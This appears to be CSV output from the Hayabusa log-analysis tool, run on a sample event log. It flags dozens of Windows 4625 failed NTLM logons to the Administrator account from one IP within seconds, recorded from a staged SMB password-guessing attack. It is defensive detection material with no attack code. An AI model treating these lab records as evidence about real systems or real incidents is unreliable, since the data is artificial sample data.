2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
